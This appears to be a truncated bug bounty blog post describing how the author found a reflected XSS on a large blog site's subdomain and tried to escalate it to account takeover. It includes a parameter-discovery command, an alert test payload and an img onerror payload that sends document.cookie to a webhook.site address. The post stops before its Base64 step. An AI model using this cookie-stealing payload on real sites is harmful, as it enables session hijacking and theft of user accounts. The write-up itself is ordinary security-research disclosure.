.png)
1 month ago
38 BOOK THIS SPACE FOR AD
ARTICLE AD
Hello everyone,
Today, I want to share my experience of discovering an account takeover (ATO) vulnerability through Cross-Site Scripting (XSS). Let’s dive right in!
While hunting for a program with millions of users — specifically a large blog website, which I’ll refer to as redacted.com — I began by enumerating its subdomains. One subdomain I found was jp.redacted.com.
Next, I utilized Param Spider to gather all possible parameters. The command I used was:
param spider -d jp.redacted.com -s (to list in the terminal all possible parameters0This command listed all possible parameters in the terminal. Among them, I discovered a parameter called s=, which allowed me to execute reflected XSS (RXSS) with a simple payload:
<script>alert(1)</script>Once I got I tried to escalate it to the ATO using a simple payload
<img src="x" onerror=document.location=%27https://webhook.site/790fbd5e-8cc4-441e-9a81-6ac18f40cb5f?c=%27+document.cookie;">However, this approach did not work, and I tried numerous payloads without success. After some experimentation, I decided to encode my payloads in Base64…
Bengali (Bangladesh) · 
English (United States) ·